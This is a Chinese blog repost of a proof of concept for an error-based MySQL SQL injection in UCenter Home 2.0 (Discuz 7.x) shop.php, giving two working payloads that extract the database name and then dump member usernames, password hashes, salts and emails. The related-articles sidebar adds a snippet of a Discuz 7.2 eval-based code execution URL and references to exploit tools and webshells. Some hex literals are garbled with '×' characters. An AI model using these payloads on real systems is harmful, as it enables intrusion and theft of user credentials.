Discuz7.X通杀0day(UCenter Home-2.0) poc

最新推荐文章于 2023-10-05 11:43:37 发布
最新推荐文章于 2023-10-05 11:43:37 发布
阅读量949 收藏
点赞数
分类专栏: 漏洞收集 文章标签: database hex mysql sql

作者: inj3ct0r

漏洞文件 : Shop.php
漏洞表现: ?ac=view&shopid=
漏洞类型 : SQL Injection (MySQL Error Based)
利用POC:
1、查询出UC_HOME的DATABSE:

and (select 1 from(select count(*),concat((select (select concat(0x7e,0×27,unhex(hex(database())),0×27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

2、根据1查询出的DATABSE(替换XXOO_UC_DB),进一步注入出member信息:

and (select 1 from(select count(*),concat((select (select (select concat(0x7e,0×27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.salt,0x3a,uc_members.email) as char),0×27,0x7e) from `XXOO_UC_DB`.uc_members LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
trackback

>
7禧
关注
专栏目录
Discuz!7.X 0day漏洞利用工具
03-04
Discuz!7.X 0day漏洞利用工具分享下!
安鸾渗透实战平台(CMS系列)—— Discuz (150分)
weixin_50985113的博客
04-29 2010
漏洞环境 安鸾渗透实战平台 火狐代理插件(foxyproxy) burp suitepro(抓包工具) 中国蚁剑(webshell管理工具) 题目 情况分析 1、访问网页,右下角有CMS版本名称和版本号 2、使用搜索引擎去查看历史漏洞 3、挑选一个进行测试 用一个远程代码执行的: 1.Discuz国际版漏洞存在于cookie的language可控并且没有严格过滤,导致可以远程代码执行。 2.产生原因:Discuz!ML 系统对cookie中的l接收的language参数内容未过滤,导致字符串拼接,从
Discuz!X 3.4任意文件删除漏洞
若把此心以学道,即身成佛有何难
10-05 717
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
discuz漏洞汇总
热门推荐
hacker0ne的博客
05-05 5万+
Discuz漏洞拿服务器 路径泄露 ‘api/addons/zendcheck.php’, ‘api/addons/zendcheck52.php’, ‘api/addons/zendcheck53.php’, ‘source/plugin/mobile/api/1/index.php’, ...
uvaoj1585oxooxx得分问题
kalilili的专栏
12-03 5029
/*There is an objective test result such as ``OOXXOXXOOO". An `O' means a correct answer of a problem and an `X' means a wrong answer. The score of each problem of this test is calculated by itself an
论坛社区UCenter Home 2.0 正式版 繁体中文BIG5-ucenter-home-2.0-tc-big5.zip
最新发布
03-10
这款正式版的繁体中文BIG5版本(ucenter-home-2.0-tc-big5.zip)是针对使用繁体中文环境的用户设计的,旨在提供更符合台湾、香港等地用户习惯的语言体验。此压缩包包含了完整的安装文件以及相关的项目文件资料,方便...
UCenter Home v2.0 繁体中文UTF-8.zip
07-07
相比 UCenter Home 1.5 正式版,2.0 正式版拥有以下重要更新功能: 投票 新增投票基础应用。 除一般常用投票功能外,还具有悬赏投票、限制男女投票、评论限制、投票截止日期等功能选项; 活动 新增活动基础应用...
[论坛社区]UCenter Home 2.0 正式版 简体中文UTF-8_ucenter_home_2.0_sc_utf.zip
03-15
[论坛社区]UCenter Home 2.0 正式版 简体中文UTF-8_ucenter_home_2.0_sc_utf.zip[论坛社区]UCenter Home 2.0 正式版 简体中文UTF-8_ucenter_home_2.0_sc_utf.zip 1.适合个人搭建网站项目参考 2.适合学生毕业设计搭建...
UCenter Home-中秋搏饼插件 v1.2 UTF8版.zip
06-19
《UCenter Home 中秋搏饼插件 v1.2 UTF8版》是一个专为社区平台设计的节日互动组件,主要用于增强用户在中秋节期间的互动体验。这个插件基于UTF8编码,确保了对多语言环境的良好支持,尤其适用于中文用户。下面我们...
UCenter Home v2.0 UTF-8 简体中文 正式版
10-14
伴随着UCenter Home 2.0的推出,应用站点可以轻松实现投票、道具、热闹与开放式视频认证等十余项创新功能,进一步提高了站点用户之间的互动性,增强社交网络用户交流的真实感。通过UCenter Home 2.0可以轻松建立一个...
dzexp利用工具 dz7.1 dz7.2 0day漏洞利用
01-28
dzexp利用工具 dz7.1 dz7.2 0day漏洞利用
Discuz所有版本通杀Oday
05-28
Discuz所有版本通杀Oday
discuz7.2漏洞复现--python编写poc
m0_65129142的博客
12-21 1121
环境搭建 准备一台win7装上的phpstudy 将discuz7.2源码放进去 安装discuz之前,需要先安装center 文件夹搭建存放的位置是: 解压完成之后更改名称 再然后需要把ucenter放到discuz源码下边 开始安装 安装discuz之前 首先需要安装ucenter 我们先将源码拉进phpstudy根目录下边 首先安装ucenter 需要填的只有标红框的 安装完成之后 我们进行安装2 最关键的一步来了 需要将ucenter的url修改成http://192.168.
discuz7.2sql注入漏洞
weixin_40709439的博客
09-20 8412
今天尝试了discuz7.2动力论坛的sql注入漏洞 原因是由faq.php文件源码存在漏洞引起的 下载官方discuz7.2源码,在本地搭建漏洞环境 http://www.comsenz.com/downloads/install/discuz 下载的三个文件 利用http://localhost:8088/discuz72/upload/install/index.php进行安装...
discuz php7.1,Discuz! 7.1 & 7.2 远程代码执行漏洞
weixin_29192365的博客
04-12 760
特别说明:产生漏洞的$scriptlang数组在安装插件后已经初始化,因此有安装插件的用户不受影响。漏洞介绍:Discuz!新版本7.1与7.2版本中的showmessage函数中eval中执行的参数未初始化,可以任意提交,从而可以执行任意PHP命令。漏洞分析:下面来分析下这个远程代码执行漏洞,这个问题真的很严重,可以直接写shell的:一、漏洞来自showmessage函数:functions...
Discuz 7.2漏洞入侵图解
kuxing100的专栏
05-06 4428
Discuz 7.2漏洞入侵图解 找到一个论坛,注册一个账号 注册好后,使用exp 复制以下代码: http://此处为论坛地址/misc.php?action=imme_binding&response[result]=1:2&scriptlang[1][2]=${${eval(chr(102).chr(112).chr(117).chr(11
discuz7.2漏洞分析
qq_38415434的博客
08-07 912
一 参数的入口 这段话的意思时遍历三种提交的方法,获取参数传递的值。 有一个函数是daddslashes,跟进看一下。 这段代码的意思是对数据里的每一个字符都进行转义处理 二 漏洞产生的代码在faq.php195行 跟进implodeid函数,在faq.php的675行 这个函数的功能将数组里的值拆分出来,如图 到了这里我们知道,如果数组值当中存在在 / 或者 ’ ,那么在拼接s...
Ucenter Home SQL注入漏洞详细分析(需要GPC=OFF)
收集盒 Book box
05-16 1849
SQL Injection 1: 漏洞在文件\source\cp_profile.php <?php // .......省略....... //性别 $_POST['sex'] = intval($_POST['sex']); if($_POST['sex'] && empty($s
mysql 触发器 lod_UCenter Home 2.0 SQL注入漏洞
weixin_30832021的博客
02-27 194
EXP:1,得到数据库名称http://server/shop.php?ac=view&shopid=253and(select 1 from(select count(*),concat((select (selectconcat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) frominformation_schema.tables limi...
UCenter Home 2.0 安装指南:从准备到部署
UCenter Home 2.0 安装方法详细介绍 UCenter Home 2.0 安装方法详细介绍是指在服务器上安装UCenter Home 2.0 的步骤和注意事项的详细介绍。本教程将指导用户从下载UCenter Home 2.0 程序包到完成安装的整个过程。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值